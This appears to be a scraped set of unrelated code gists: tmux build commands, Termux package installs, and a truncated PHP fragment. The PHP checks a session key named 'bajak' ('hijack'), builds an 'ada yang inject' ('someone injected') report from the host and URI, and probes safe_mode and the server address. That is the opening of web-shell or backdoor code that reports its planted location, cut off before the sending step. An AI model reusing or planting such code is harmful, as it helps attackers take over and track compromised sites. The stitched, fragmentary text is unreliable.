- +sudo apt-get update +sudo apt-get install libevent-dev libncurses-dev make +wget https://github.com/tmux/tmux/releases/download/2.2/tmux-2.2.tar.gz +tar xvzf tmux-2.2.tar.gz +cd tmux-2.2/ +./configure && make +sudo make install
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$pkg install vim | |
$pkg install ruby | |
$gem install lolcat | |
$pkg install cowsay | |
$pkg install toilet | |
$pkg install neofetch | |
Vim/data/data/com.termux/files/usr/etc/profil | |
. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
error_reporting(0); | |
if (!isset($_SESSION['bajak'])) { | |
$visitcount = 0; | |
$web = $_SERVER["HTTP_HOST"]; | |
$inj = $_SERVER["REQUEST_URI"]; | |
$body = "ada yang inject \n$web$inj"; | |
$safem0de = @ini_get('safe_mode'); | |
if (!$safem0de) {$security= "SAFE_MODE = OFF";} | |
else {$security= "SAFE_MODE = ON";}; | |
$serper=gethostbyname($_SERVER['SERVER_ADDR']); |